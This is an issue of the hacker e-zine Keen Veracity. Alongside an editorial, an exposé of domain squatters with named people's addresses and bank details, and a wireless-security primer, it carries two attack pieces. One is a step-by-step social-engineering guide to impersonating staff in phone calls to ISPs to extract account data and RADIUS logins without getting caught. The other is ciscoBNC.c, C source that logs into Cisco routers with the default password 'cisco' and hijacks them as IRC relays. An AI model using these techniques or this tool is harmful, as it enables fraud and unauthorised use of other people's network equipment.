-------------------------------------------------------------------------------- _ _ _ _ _ | | / ) | | | | (_)_ | | / / ____ ____ ____ | | | |___ ____ ____ ____ _| |_ _ _ | |< < / _ ) _ ) _ \ \ \/ / _ )/ ___) _ |/ ___) | _) | | | | | \ ( (/ ( (/ /| | | | \ ( (/ /| | ( ( | ( (___| | |_| |_| | |_| \_)____)____)_| |_| \/ \____)_| \_||_|\____)_|\___)__ | (____/ -------------------------------------------------------------------------------- I S S U E (14) L e g i o n s o f t h e U n d e r g r o u n d ----------------------------------------------------[www.legions.org]----------- -------------------------------------------------------------------------------- M E M B E R S : lothos Digital Ebola Firewa11 DataShark Overdose1 Phriction ntwak0 pr00f havoc TouchTone archim phemetrix crabby gridmark bantrix -------------------------------------------------------------------------------- [CONTENTS]------------------------------------------------------------[CONTENTS] [1]====================================[Editorial - Lothos ] [2]============================================[Squatters Exposed! - Anonymous ] [3]========================[The Art of: Social Engineering - danny@away.net.au ] [4]=======================================[ciscoBNC.c - chrak ] [5]===================[Wireless Technology Exposed - Vortek ] [6]==================================[Harriet the Spy - Dreid ] -------------------------------------------------------------------------------- When I decided to take over the job of editing Keen Veracity, Legions of the Underground was dead. Maybe not maggot-ridden dead, but on life support kind of dead. The last issue of Keen Veracity, kv13, was released over a year ago, and that was just a rehash of old articles with little original content, so it hardly counts. I can understand the old school articles, becuase it's difficult to pull something together when the group doesn't contribute. The last kv with original content, kv12, was published 7-27-2002, over three years ago. That issue had over 21 original articles written by group members and others. This issue, as you can see, has 9, which is sad because Keen Veracity used to be a quality magazine that was well respected in the security community. I have tried to breath some life into Legions of the Underground. For years now the members have done nothing constructive, have released no code, no advisories, nothing. I have tried to get it going again with a new issue of Keen Veracity, but the only other member to contribute something was overdose1. (Thanks bro) The irc channel, #legions on undernet, had degraded as well. People brought their girlfriends in the channel, there was a lot of drama involved with that and there was a lot of other infighting and dick-waving. DigiEbola, our "leader," was one of the biggest dick-wavers when he was supposed to be holding everything together instead of banning people for no reason other than he didn't like what they said. A lot of members have confided in me that they're not happy with digi but are afraid to say anything for fear of being banned. I registered the #legions channel with undernet channel services in an effort to provide some stability for the channel. Everyone who had ops received ops on X, no one was banned anymore for their opinions, and I figured it was a good move to make. A few people didn't see it as I did. Digi was upset because he lost control over the channel. Another member accused me of "taking over" the channel. I don't see how it could be considered a takeover, since everyone who had ops before the registration was given ops after the channel registration. Nothing changed, with the exception that people now got auto opped when entering the channel. Big deal. Anyways, I'm the most senior member still in the group. From the first published members list of Legions of the Underground, from KV3: optiklenz cap n crunch tip icer Bronc Buster sreality Zyklon havoc HyperLogik Defiant Duncan Silver Slfdstrct lothos I don't see DigiEbola listed there, and I don't see how my registering the channel on undernet was considered a "takeover." As the most senior group member left, there is an argument that I should inherit Legions of the Underground to counter the "takeover" cry. Our current "leadership" definetly isn't doing the job. I have put a lot of time, energy, effort and hard work into this group and I wasn't content to sit back and let it die. I had considered becoming the new group leader, weeding out the stagnant members and adding some new blood from the people I had recently brought to the irc channel. Unfortunetly digi controls the domain name, and while I could always get a new domain, I frankly don't believe it's worth the effort anymore. I hereby resign my membership from Legions of the Underground. It's been a wild ride and I enjoyed every minute of it, but it's time to move on to bigger and better things. I've made a lot of good friends along the way, and hope nothing will change that. I have tried as best as possible to refrain from airing our dirty laundry in the public, but some things just had to be said. Nothing personal was meant by any of this, and Digi, please don't take my comments personally. I know we've butted heads over the future of legions, it wasn't personal, and I still consider you a friend. I will be transfering ownership of the #legions undernet channel to you, effective immediately. Lothos - lothos@lothos.org http://www.lothos.org And now, on with the show. I have decided not to include my article in this issue, it may be released later on my website. Anyways, I hereby present you with what is likely the last issue of Keen Veracity. Enjoy! -------------------------------------------------------------------------------- [Squatters Exposed!]=================================================[Anonymous] -------------------------------------------------------------------------------- Squatters Exposed! by anonymous I had my domain name stolen by squatters. Now, before you start complaining that I should have renewed it if I wanted to keep it, let me explain. When your domain expires, it goes into a redemption period where it can be renewed. In my case, the redemption period was cut short and I was unable to renew my domain. My domain was stolen by a group of squatters who also happen to be spammers, pornographers, and domain registrars. How this group became domain registrars is beyond me. Now, before I get ahead of myself, a little background information and some detective work: This is the relevant whois data from my domain: Sponsoring Registrar:Intercosmos Media Group Inc. (R48-LROR) Registrant ID:ODN-676871 Registrant Name:Orion Web Registrant Organization:Orion Web Registrant Street1:1st Floor Muya House Registrant Street2:Kenyatta Ave. Registrant Street3:p. o. box 4276-30100 Registrant City:Eldoret Registrant State/Province:KE Registrant Postal Code:30100 Registrant Country:KE Registrant Phone:+254.0735434737 Registrant Phone Ext.: Registrant FAX: Registrant FAX Ext.: Registrant Email:info@kenyatech.com The admin and tech contacts are the same as above. Name Server:NS0.DIRECTNIC.COM Name Server:NS1.DIRECTNIC.COM This shows that a company called Orion Web in Kenya, Africa now owns my domain. Pulling up the web page for my domain shows a page filled with ads, with a "Click here to buy this domain" button that leads to www.kenyatech.com, the company that now owns my domain name. They also own lots of other domain names. Lots and lots, in the range of 140,000 or more. Kenyatech claims that they're located in Kenya, Africa. They also accept PayPal. Paypal does not do business with firms located in Kenya. Using GeoBytes reports that the ip address for www.kenyatech.com, 209.16.83.2, is located in Larose, Louisiana. Looking up the same address in the ARIN database shows this IP is assigned to I-55 Internet Services in Hammond, Louisiana. A little research on the www.kenyatech.com site, browsing through all the domains, shows a few patterns. The oldest dated domain I could find registered to them was in August of 2004. The most current I could find was August 23 2005, a week before this writing. Most are registerd to kenyatech, but some of the older ones are registered to: NOLDC, Inc. 838 Camp Street 4th Floor New Orleans, LA 70130 US 504-523-0360 Some of the domains are registered to Domain Contender, with the majority being registered through InterCosmos Media Group, DBA directnic.com. Curious about where they're from? They're both owned by the same people, and the address is: 650 Poydras Street Suite 1150 New Orleans, LA 70130 US (504) 679-5170 Is it just me, or is there a pattern developing with all these Louisiana addresses?? The Camp Street address and the Poydras street address are within blocks of each other. I filled out a form on www.kenyatech.com offering to buy the domain for $50. This offer was turned down. They instead suggested that I pay $300 plus a $30 fee, according to the following: Hello, NOLDC, Inc. accepts wire, money order or certified or cashiers check (international checks please add an additional US$50 processing fee) only. Checks and money orders must be made payable to NOLDC, Inc., and sent to: NOLDC, Inc. 838 Camp St., 4th Floor New Orleans, Louisiana 70130 NOLDC, Inc. Wire Information (Note: Please be sure to add wire fees to final price of domain purchase. Also, be sure to include the domain name that you are purchasing in the Additional Information Section.) Wire Fees for US Banks is $10.00 Wire Fees for Banks outside of the US is $50.00 Bank: Hibernia Bank 2412 Manhattan Blvd Harvey, La 70058 USA ABA#: 065000090 Account#: 2080083613 Swift Code: HIBKUS44 Beneficiary: NOLDC, Inc. 650 Poydras St Ste 1150 New Orleans, La 70130 USA Sincerely- NOLDC, Inc. This links the Camp Street address with the Poydras Street address, by their own admission. Now, who owns Intercosmos a.k.a directnic.com, who owns Domain Contenders, and who owns NOLDC, Inc? A man by the name of Sigmund Solares. I suspect that kenyatech.com is also owned by Sigmund Solares, given all the evidence provided above. Sigmund Solares has a history of domain squatting, and a history of hiding behind non-existant entities for the purpose of hiding his squatting. This WIPO arbitration decision clearly outlines this: Complainant claims that Respondent has no rights or legitimate interests in the disputed domain name. According to Complainant, this conclusion is suggested by Respondent's name: "Legal Services." Additionally, based on an investigation conducted by Complainant, Complainant claims that Legal Services is a fictitious identity adopted for the sole purpose of registering the disputed domain name. According to the investigation report there is no business by the name of Legal Services at the address listed in the .biz Whois database. Further, there is no business by the name of Legal Services at the address provided in the registration information. The only business listing found at that address is a business called "Ingrid's Beauty Salon." Likewise, the telephone number listed in the .biz Whois database is the number for an individual named "Sigmund Solares" who claims that he is not affiliated with Respondent. In fact, according to Complainant, Sigmund Solares is a principal in and primary contact for the Registrar of Respondent's domain name. Based on the above, Complainant asserts that Respondent has taken active steps to conceal its true identity and provided false contact details in connection with its domain name registration. Complainant concludes that the use of false and misleading contact information suggests that the domain name was registered for improper purposes. Complainant also asserts that the fact that its trademark has a strong reputation and is widely known is further support of Respondent's bad faith. Finally, Complainant notes that the administrative, billing and technical contacts for the registration is Joseph Tambert whose e-mail address is listed as "josephtambert@homeville.com". Complainant states that the website at is a pornographic website. Thus, Complainant claims that a risk exists that Complainant's valuable and well-known trademark and service mark will be associated with a pornographic site and will be tarnished as a result. SOURCE: http://arbiter.wipo.int/domains/decisions/html/2002/dbiz2002-00190.html Joseph Tambert may be Sigmund's partner. This is his address: Joseph Tambert 838 Camp Street New Orleans Notice the Camp Street? Sigmund and Joseph are linked together on the whois info for fbi.biz, as well as the above arbitration case. Joseph's email address, as explained in the above WIPO arbitration quote, links to a pornographic website. Sigmund's email, as listed on the whois for sigmundsolares.com, also points to a porn site. This group has had IP addresses blocked for sending spam. They have a history of domain squatting. How the hell did they become domain registrars? As domain registrars, this gives them access to the whois database. I believe that they use that access to aquire a list of domains entering the expiration period. They would then be able to flag that domain as being under their control, allowing them to transfer ownership to the Kenyatech entity and cutting short the redemption period. There is also evidence that suggests they abuse the whois database. The whois database is used to find information on a domain name, including if it is available for purchase. They may have access to what names are looked up, and if it is available, and there is evidence to suggest that they register these names for themselves before others have a chance to. They also have a script on every domain they own, to judge the domain's popularity. This script stores its data on a machine owned by directnic.com. The more popular sites have to pay more money to buy the domain back. I have seen less popular sites go for as little as $50, and I've seen some offers of a thousand dollars turned down. The more popular sites are renewed, and the less popular are allowed to expire. Being domain registrars, they might not have had to pay anything to aquire the 144,000+ domains they own. So, what can you do? If your domain was snatched, by all means don't visit it or the kenyatech web site. Hopefully it will be allowed to expire. Contact anyone linking to your website, and have them change the link. If you have a popular domain, your only hope may be to go through arbitration, or sue. There is a class action lawsuit being organized by rederon.net. Complain to ICANN.org, and hopefully we can have their domain registrar status revoked. By all means, don't pay them and support their bad habits! [ Editor's note: I also had my domain stolen by kenyatech.com, so when I received this I couldn't resist including it. The domain name was for RootFest, my computer security convention held in Minneapolis, Minnesota. I am selling RootFest t-shirts to raise the funds needed to get my domain back. If you're interested in supporting me, or just want to know more about my specific case, please visit http://www.rootfest.net. -lothos ] -------------------------------------------------------------------------------- [The Art of: Social Engineering]====================[danny\ ] -------------------------------------------------------------------------------- %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% The Art Of: %% %% Social Engineering %% %% %% %% danny\ %% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% http://www.legions.org/kv/kv14.txt ********************************** %%%%%%%%%%%%%%%%%%% %% Introduction: %% %%%%%%%%%%%%%%%%%%% Social engineering is one of the most effective way's to pulling off some of the largest security breaches. With a concunction of being technically savvy, and being organised and believable, you are a major security threat. In this paper, I hope to help unleash, and evolve, the social engineering skills within you, because of course, everyone has at one stage in their life social engineered. %%%%%%%%%%%%%%%%%%%%%%%%%% %% What Is: %% %% Social Engineering %% %%%%%%%%%%%%%%%%%%%%%%%%%% Social Engineering is decieving and manipulating a target. Social engineering tactics are usually done with the medium of a telephone; It's easier to attack without being seen, and when carried out correctly, is mostly flawless granted that you manipulate the operator into beliving that you are, acutally who you say you are. For most operators, if someone rings up, it's not out of the ordinary to be requesting information, and their job description consists of supplying you with this -- It's not hard to get something you want, from someone that is offering it to you! %%%%%%%%%%%%%%%%%%%%%%%%%% %% Doing Your Homework: %% %%%%%%%%%%%%%%%%%%%%%%%%%% Doing your homework on the target that you will be attempting to gain information from is a vital part of the social engineering proccess. You need to know what you want, how you want it, and you have to get the point across with a very positive and confident attitude -- Make it believeable! Do not stumble over your words; Everything has to be clear, concise and professional. When studying about the target, it is essential to only concentrate on the details that actually matter. Study the terminology used in the industry, you don't want to sound clueless when asked a question, background information is imperative. %%%%%%%%%%%%%%%%%%%%%%%% %% Being Manipulative %% %%%%%%%%%%%%%%%%%%%%%%%% Being manipulative when carrying out a social engineering attack is a neccessity, this is how you will influence the target and controlling them to do, what you exactly want them to without them even realising it. It's a very skillful, under the radar technique that will help you graciously. Again, being manipulative means you have to be familiar with the target, referring back to the "Doing your homework" section, Study the corporate information of the target, find out how their operation runs, and use it to your advantage. Use the operators name when being greeted; It's usually procedure for them to introduce themselves to the call -- This shows that you are calm, confident, and alert. Refer to an employee that works there, this gives the operator the impression that you are familiar with the company, and takes the call to a more personal level; This relieves the thought of them thinking otherwise when requesting the information you desire. There are two levels you can manipulate on. You can either claim to be a customer of the target; Used to obtain legitimate customers account information, Or claim to be a staff member in another department/employee of a company that the target deals with. NOTE: Both can be very effective if the attack is carried out correctly. %%%%%%%%%%%%%%%%%%%%%%%%%%%% %% Finding A Target: %% %% Practice Makes Perfect %% %%%%%%%%%%%%%%%%%%%%%%%%%%%% Before attempting to carry out a social engineering attack on a high profile target, practicing on smaller, more vulnerable companies is very valuable; There's no room for mistakes, especialy when the consequences can mean a pretty heavy jail term. Attempt to social engineer your local ISP; Most local ISPs resell their services from a larger mainstream provider. Claim to be an employee of the company which resells their services to the target; Remember to introduce yourself in a clear and concise manner, sound confident, and ask for the right people in the correct department. This opens an array of doors of where you want to take the attack, whether it be updating their payment details in your system, or confirming radius server logins for an urgent security maintenance which needs to be undertaken immediatley on their managed server -- Have this planned, you need to know exaclty what you have to say, every step of the call, do not miss a beat. Do not sound too eager to gather the information, remember, manipulate them. Make them believe that it a security issue on their behalf, and without the proper fix, their current operation won't be running smoothly; It's all about them! Advise them on how long it will be before the maintentance is complete. Once the supposed maintenance has been completed in the timeframe you have given them, provide them a courtesy callback that the issue has been resolved. This strikes out the risk of them calling the mainstream provider to see whats happening with the update, and minimises the risk of being caught. %%%%%%%%%%%%%%%%%%%%%%%%%% %% Easy? Not Quite. %% %%%%%%%%%%%%%%%%%%%%%%%%%% It's not always going to be so easy, at times you may find yourself to be in a heated situation, remain calm, stay in character, offer a callback from one of your superiors to have the situation sorted out, do whatever means neccessary. Remember, once you start digging your way through the inner workings of a target, it's only going to get harder. The most vulnerable part of a company are their employees. Operators may be easy to exploit, but when speaking to senior representatives, and executives of the company, it's going to be a whole lot more challenging. %%%%%%%%%%%%%%%%%%%%%%%%%% %% Conclusion %% %%%%%%%%%%%%%%%%%%%%%%%%%% So, This concludes my paper. Hopefully this outlines what you need to know on your journey as a Social Engineer. There are social engineers everywhere, so the next time you pick up a call, You may have to try twice as hard to identify who you are actually talking to! Have Fun! %%%%%%%%%%%%%%%%%%%%%%%%%% %% References %% %%%%%%%%%%%%%%%%%%%%%%%%%% Here's some papers and books that will help you. There are alot of factors to cover, please visit some of these offsite links for your benefit: - Paper: Social Engineering - Link: http://www.sans.org/rr/whitepapers/engineering/1365.php - Author: Aaron Dolan - Book: The Art Of Deception: Controlling the Human Element of Security - Link: http://www.amazon.com/exec/obidos/tg/detail/-/0471237124/102-1921421-8544955?v=glance - Author: Kevin Mitnick - Paper: Social Engineering: It's a matter of trust - Link: http://www.computerworld.com/securitytopics/security/story/0,10801,82894,00.html - Author: Douglas Schweitze -------------------------------------------------------------------------------- [ciscoBNC]==============================================[Chrak ] -------------------------------------------------------------------------------- [ Editer's note: Chrak was supposed to do a writeup of this for kv, but he's been missing in action for a while. I decided to include it as is. ] /* Written 2005 by chrak shoutoutz to #b4b0 and #c1zc0 @ EFNet ircclient -> ciscoBNC -> router -> ircserver /server ciscoBNCserv 7777 /quote doitup 1.1.1.1 mypass irc.LOL.com 6667 this is version 0.9, next will have more bug fixes, error checking, password pro tection, ability to disconnect and resume irc sessions, lists of DOITUPs stored! can someone email me if they know how to turn off IOS> shell echoing? This code is distributed under the GNU Public Licence (GPL) version 2. See http://www.gnu.org/ for further details of the GPL. If you do not have a web browser you can read the LICENSE file in this directory. **/ #include #include #include #include #include #include #include #include #include #include #include #define D_VER "0.9" #define D_PORT "7777" #define D_REALNAME "ciscoBNC user" int create_server (unsigned int port); int server_notice (int sock, char *msg); int server_notice_from (int sock, char *msg, char *from); int serve_client (int sock); int relay_client_and_router (int sock, int r_sock); int rnd1toN (int max); void startdaemon (void) { switch (fork ()) { case -1: perror ("fork()"); exit (1); case 0: /* child */ break; default: /* parent */ exit (0); } if (setsid () == -1) { perror ("setsid()"); exit (1); } //fclose(stdin); //fclose(stdout); } // vhost = NULL for no bind() int connect_to_tcphost (const char *hostname, unsigned int port, const char *vhost) { int sock; struct hostent *he, *hel; struct sockaddr_in saddr; struct sockaddr_in localaddr; if ((sock = socket (AF_INET, SOCK_STREAM, 0)) == -1) { perror ("socket()"); return -1; } if (vhost) { if ((hel = gethostbyname (vhost)) == NULL) { herror ("gethostbyname()"); close (sock); return -1; } memset (&localaddr, 0, sizeof (struct sockaddr_in)); localaddr.sin_family = AF_INET; localaddr.sin_port = 0; localaddr.sin_addr = *((struct in_addr *) hel->h_addr); /* this is to use VHOST */ if (bind (sock, (struct sockaddr *) &localaddr, sizeof (localaddr))) { perror ("bind()"); close (sock); return -1; } } if ((he = gethostbyname (hostname)) == NULL) { herror ("gethostbyname()"); close (sock); return -1; } saddr.sin_family = AF_INET; saddr.sin_port = htons (port); saddr.sin_addr = *((struct in_addr *) he->h_addr); if (connect (sock, (struct sockaddr *) &saddr, sizeof (struct sockaddr)) == -1) { perror ("connect()"); close (sock); return -1; } return sock; } int readline_from_sock (int sock, char *line, int max_read) { int i = 0, retval = 0; bzero (line, max_read); retval = recv (sock, line, max_read, MSG_PEEK); while (line[i] != '\n' && i != max_read && i != retval) ++i; retval = read (sock, line, ++i); line[i] = '\0'; /* terminate the string */ // sloppy but to kill it if (strlen (line) == 0) { fprintf (stderr, "KILLING THIS CONNECTION\n"); exit (0); } return retval; } int main (int argc, char *argv[]) { int sock, csock, l; struct sockaddr_in caddr; fprintf (stderr, "ciscoBNC V%s\nrun with additional arg to make daemon (%s -)\n(chrak@b4b0.org) (http://www.chrakworld.com)\non port %s\n", D_VER, argv[0], D_PORT); if ((sock = create_server (atoi (D_PORT))) == -1) { // change to stdout so we can see it from PHP!!@!@ fprintf (stderr, "create_server FAIL\n"); exit (-1); } if (argc > 1) startdaemon (); // stop zombies signal (SIGCHLD, SIG_IGN); while (1) { l = sizeof (struct sockaddr_in); if ((csock = accept (sock, (struct sockaddr *) &caddr, &l)) == -1) { perror ("accept()"); exit (-1); } fprintf (stderr, "connection from: %s\n", inet_ntoa (caddr.sin_addr)); switch (fork ()) { case -1: perror ("fork()"); //write(csock,"fork():ERROR\r\n",strlen("fork():ERROR\r\n")); exit (1); case 0: /* child */ server_notice (csock, "connected to ciscoBNC!"); { serve_client (csock); } close (csock); exit (0); default: /* parent */ close (csock); } } } int create_server (unsigned int port) { int sock, l = 1; struct sockaddr_in saddr; if ((sock = socket (AF_INET, SOCK_STREAM, 0)) == -1) { perror ("socket()"); return -1; } setsockopt (sock, SOL_SOCKET, SO_REUSEADDR, &l, sizeof (int)); saddr.sin_family = AF_INET; saddr.sin_port = htons (port); saddr.sin_addr.s_addr = INADDR_ANY; if (bind (sock, (struct sockaddr *) &saddr, sizeof (struct sockaddr)) == -1) { perror ("bind()"); return -1; } /* only 5 connection at a time heh!@ */ if (listen (sock, 5) == -1) { perror ("listen()"); return -1; } return sock; } int serve_client (int sock) { char buf[1024]; char doitup[250]; char mbuf[1024]; int connected_to_router = 0; int connecting_to_irc = 0; int sent_pass_once = 0; int r_sock; char *routername; char *routerpass; char *ircservname; char *ircport; char myuser[20], mynick[20]; srand (time (NULL)); // seed random # generator snprintf (myuser, sizeof (myuser), "user%d", rnd1toN (99)); snprintf (mynick, sizeof (mynick), "d0ud%d", rnd1toN (99)); repeatdoitup: routername = NULL; routerpass = NULL; ircservname = NULL; ircport = NULL; server_notice (sock, "**************TO CONTINUE*******************"); server_notice (sock, "HELP ME OUT CLICK ADS AT http://www.chrakworld.com !!"); server_notice (sock, "/QUOTE DOITUP router routerpass ircserver ircserverport"); server_notice (sock, "EXAMPLE /quote doitup 1.1.1.1 mypass irc.LOL.com 6667"); while (1) { if (readline_from_sock (sock, buf, sizeof (buf)) == -1) { perror ("readline_from_sock()"); //change. return -1; } if (!strncasecmp (buf, "DOITUP", strlen ("DOITUP"))) { char *p; strncpy (doitup, buf, sizeof (doitup)); if ((p = strtok (doitup, " \r\n"))) { while ((p = strtok (NULL, " \r\n")) && (!routername || !routerpass || !ircservname || !ircport)) { if (!routername) routername = p; else if (!routerpass) routerpass = p; else if (!ircservname) ircservname = p; else if (!ircport) ircport = p; } if (!routername || !routerpass || !ircservname || !ircport) goto repeatdoitup; // fuck you snprintf (buf, sizeof (buf), "OK.. connecting to router %s with pass %s,ircserver %s: %s\n\nQUOTE something else if nothing happens\n", routername, routerpass, ircservname, ircport); server_notice (sock, buf); goto doitup_done; // goto } else { goto repeatdoitup; //LOL } } } doitup_done: while (1) { if (readline_from_sock (sock, buf, sizeof (buf)) == -1) { perror ("readline_from_sock()"); //change. return -1; } if ((r_sock = connect_to_tcphost (routername, 23, NULL)) != -1) { connected_to_router = 1; snprintf (mbuf, sizeof (mbuf), "connected to %s", routername); server_notice (sock, mbuf); while (1) { if (readline_from_sock (r_sock, buf, sizeof (buf)) == -1) { perror ("readline_from_sock()"); //change. // do something } else { // buf[strlen (buf) - 1] = '\0'; if (strstr (buf, "assword:")) // send router passwd { if (sent_pass_once) // failed already. reprompted { // test this server_notice (sock, "ROUTER PASSWORD FAILED!!!"); return -1; } sent_pass_once = 1; server_notice_from (sock, "Logging into router...", "ciscoBNC"); write (r_sock, "cisco\r\n", strlen ("cisco\r\n")); } else if (buf[strlen (buf) - 1] == '>') // got cmd prompt { if (connecting_to_irc) // failed. back at prompt. { server_notice (sock, "connect irc port FAILED!!"); return -1; } server_notice_from (sock, "trying connect irc server", routername); // write (r_sock, // "telnet Sterling.VA.US.UnderNet.org 6667\r\n", // strlen // ("telnet Sterling.VA.US.UnderNet.org 6667\r\n")); snprintf (buf, sizeof (buf), "connect %s %s\r\n", ircservname, ircport); write (r_sock, buf, strlen (buf)); connecting_to_irc = 1; } else if (strstr (buf, "Open")) // connection opened! { snprintf (buf, sizeof (buf), "USER %s %s %s %s\r\n", myuser, routername, ircservname, D_REALNAME); write (r_sock, buf, strlen (buf)); snprintf (buf, sizeof (buf), "NICK %s\r\n", mynick); write (r_sock, buf, strlen (buf)); relay_client_and_router (sock, r_sock); return 0; } } } } else { // fail! return -1; } } } int server_notice (int sock, char *msg) { char buf[1024]; snprintf (buf, sizeof (buf), "NOTICE * :%s\r\n", msg); return write (sock, buf, strlen (buf)); } int server_notice_from (int sock, char *msg, char *from) { char buf[1024]; snprintf (buf, sizeof (buf), "%s: %s", from, msg); return server_notice (sock, buf); } // assumes we are connected to irc server from router already. int relay_client_and_router (int sock, int r_sock) { char buf[1024]; char buf1[1024]; fd_set rfds; int retval; while (1) { FD_ZERO (&rfds); FD_SET (sock, &rfds); FD_SET (r_sock, &rfds); retval = select (1023, &rfds, NULL, NULL, 0); if (retval) { if (FD_ISSET (sock, &rfds)) { if (readline_from_sock (sock, buf, sizeof (buf)) > 0) { write (r_sock, buf, strlen (buf)); strncpy (buf1, buf, sizeof (buf1)); // save last thing sent.we will need this to stop shell echo from IOS. } // else.. } if (FD_ISSET (r_sock, &rfds)) { if (readline_from_sock (r_sock, buf, sizeof (buf)) > 0) { if (strcmp (buf, buf1)) write (sock, buf, strlen (buf)); else { // printf ("IGNORING IOS ECHO\n"); } // else } } } } } int rnd1toN (int max) { return (rand () % max) + 1; } -------------------------------------------------------------------------------- [Wireless Technology Exposed]========================[Vortek ] -------------------------------------------------------------------------------- Wireless Technologies Exposed Security and Specifications demystified VORTEK Knowledge is a process of piling up facts; wisdom lies in their simplification Martin H. Ficher Greetings, the purpose of this article is to explain a few things about wireless. I will not go in depth to the security features of IEEE 802.11 specification families. However, I will cover the basics so you will understand enough to distinguish between the different specifications. You will know which to apply based on its level of security, And hopefully you will have enough knowledge to decide for your self. NOTE: I Will assume you know the RAW basics of some things. If you do not google.com them. This article is not meant to be a novel. Besides you will learn a thing or two. Now Grab your favorite beer, wraps or stimulant drink and lets get started! Grab that shit I'm serous! The IEEE 802.11 family of specifications are broke down into 4 types. Well 3 officially. We will begin by breaking down the basics of each type and its features. We will cover its air waves its basic features of speed range and such. And its basic security. The first Specification we will start with is older than an unpatched chinese server. I didn't cover plain 802.11 Because its ANCIENT! 802.11A This specification operates on the 5GHz band. Which is good because most of your current house hold phones work on the overcrowded 2.4GHz band. The downfall to this higher frequency range is its inability to penetrate walls and obstructions, which can be quit cumbersome. It also carries a higher cost for its equipment. Let alone its crappy range. Expect to get a maximum speed of 54 Mbps Now the A specifaction uses orthogonal frequency division multiplexing (OFDM). OFDM basically splits radio signals into a lot of smaller sub-signals, which in turn are transmitted simultaneously to different frequencies towards the receiver. This reduces some of the crosstalk also. If you'd like more info on OFDM google it. This is an article not a novel. 802.11B This specification operates in the 2.4Ghz band. This means overcrowded, Don't use close to microwaves or 2.4Ghz Cordless phones. Now this frequency penetrates walls a heck of a lot easier. Set your channels right on your Wireless Router and your signal can go 3 floors down. You also get much more range with B. Now don't expect much speed from this specification it's only 11 Mbps, But its more of a stable signal. These products also tend to be cheaper in cost and more widely used. The 802.11B Specification uses direct sequence spread spectrum (DSSS). Basically there is a chipping code that uses a redundant bit pattern for each bit that is transmitted, which in return aids in resistance to interference. If any of the bits are corrupted the original data will be recovered due to the redundancy of the transmission. Basically THIS MEANS ERROR CORRECTING! Want more info google for DSSS. 802.11G This is nothing more then the best of A and B mixed. It's 2.4Ghz At 54Mbps. It is also backwards compatible with b. G also uses OFDM. Now there are some routers that go way beyond 54Mbps with Turbo modes, But why? Your not running a some huge FiberObtic network are you? 802.11 (pre) N We will cover this after the security section which I will explain later. Ok the security of these are basically all the same. Crappy WEP and WPA1 which is basically nothing more then what was working from 802.11I at the time. We all know why WEP is insecure. It breaks the #1 cardinal RULE OF RC4 NEVER EVER REPEAT THE KEYS. The problem with WEP is not in RC4 in itself as you can see. The problem is the idiots who made 802.11 did not specify how IV"s "Initial Vectors" should be created, also the algorithm is pure crap. WEP uses 24 bits for its IV value range which as you can see, we could easily use this up with high volume traffic. This basically means that the same IV will be used with a different datapacket! "BREAKING THE RC4 Cardinal RULE!" What, you ask well what if there is no traffic? There are methods to force traffic. >:) IF you want to know them Read a WEP cracking tutorial. There are plenty of good ones on google.com. Now just to clarify a few things, You may wonder what the IV really is. 24-bit values are attached to the secret key and used in the RC4 cipher stream. The reason we have IVs is to ensure that the value used as a seed for the RC4 PRNG "Pseudo Random Number Generator" is always different. Ok what does all this mean ? I record all your wep traffic until I receive 2 packets that have the same IV aka RC4 keys I can use a XOR function to link 2 packets and compute the key. In other words Do not use WEP AT ALL. I don't care how elite your crypto key is. Ok now lets cover WPA1, Which is basically nothing but a TKIP "Temporal Key Integrity Protocol" wrapper around wep. For starters this prevents the repeat attacks that WEP has by extending the IV to 48 bits. And by now we all know that IV's are used to encrypt the data in the packet. Now TKIP adds a few security enhancements to wep. The first is Cryptographic message integrity code (MIC). Which prevents forgery. Its basically a cryptographic checksum that protects against forgery attacks. The second feature IV sequencing (TSC) "TKIP Sequence Counter" prevents replaying of data. Basically if the TSC in the IV better match with in a certain range when received or the packets are drooped. The 3rd method is the Per-Packet mixing function. Basically this means that were changing the encryption key every now and then for the client. It also provides a message integrity checker. This method is a little to advanced to cover here.. Now remember boys and girls this is all based on RC4. Now the good stuff WPA2 WPA2 is a full implementation of certified 802.11I. It uses AES-CCMP "(AES-C)Gunter Mode (C)BC-(M)AC (P)rotocol" This is also the standard for the Pre N serious of routers. WPA2 utilizes many advanced features over WPA1 The #1 feature is AES (Advanced Encryption Standard) It's basically Military crypto warez. So no more crappy RC4. It also uses PMK (Pair-wise Master Key) which allows you to reconnect to your access point if lets say you walked to another AP and back. "You will not have to re authenticate." Also Pre-authentication allows you to pre-authenticate to another AP, While holding your connection to your existing AP. Basically you only need 1/10th of second to change AP's while roaming. Now if you don't use Pre-authentication with PMK caching It would take more then a second and some of your time sensitive crap like video, VoIP and other crap will go FUBAR! Ok for the other features. For starters we get forced 128 bit keys!!! h0h0h0h0! Basically every thing else is the same as wpa accept for the AES standard and PMK. But for you people who want more info.. I will just post information from the computing dictionary. Official Computing Dictionary Definition below AES-Counter Mode CBC-MAC Protocol) The encryption algorithm used in the 802.11i security protocol. It uses the AES block cipher, but restricts the key length to 128 bits. AES-CCMP incorporates two sophisticated cryptographic techniques (counter mode and CBC-MAC) and adapts them to Ethernet frames to provide a robust security protocol between the mobile client and the access point. AES itself is a very strong cipher, but counter mode makes it difficult for an eavesdropper to spot patterns, and the CBC-MAC message integrity method ensures that messages have not been tampered with. See 802.11i, AES, counter mode and CBC-MAC. "IF you want more info on this your really going to have to do a LOT of reading." There is no point on trying to refine something so short and true.. Call me a copy cat if you like. Ok now time for the phat lady to sing! 802.11 (pre-N) 802.11 (pre-N) This is basically 802.11I with certified WPA2 which in turn is a Full certified implantation of 802.11I. Now the reason we use pre-n Is because there is a battle going on in standards. We will not get into that here. But basically its like what happened in the old days with the 56k modem standards. Rockwell Vs Us Robotic. Now the advantages to PRE-N are huge. You get GREAT EXTENDED RANGE. This is achieved by using something called MIMO (Multiple Input Multiple Output), in which a number of antennas transmit many unique data streams in the same frequency channel (other Wi-Fi products transmit data in a single stream in a single channel). MIMO also uses OFDM. Which you should remember from above. You basically get 3 antennas. The advantages Are more range less interference and a funky looking evil router. Oh yeah its backwards compatible with B and G. Now you know the VERY raw basics of wireless. Well what happens beyond the GUI in your Wintendo XP Wireless configuration. Be sure to upgrade XP to support WPA2. Now lets all go to France And do some war driving, We can hack there WHITE-FLAG Linux boxes. After One failed login you get root and a system message of I surrender. I don't hate French people don't worry! And one last message to all you knew skewl kiddies. READ READ LEARN! And be glad you can google.com For it was not always this easy to GET INFORMATION! Send Hate mail to vortek@gmail.com h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0.......................................... -------------------------------------------------------------------------------- [Harriet the Spy]======================================[Dreid ] -------------------------------------------------------------------------------- Harriet 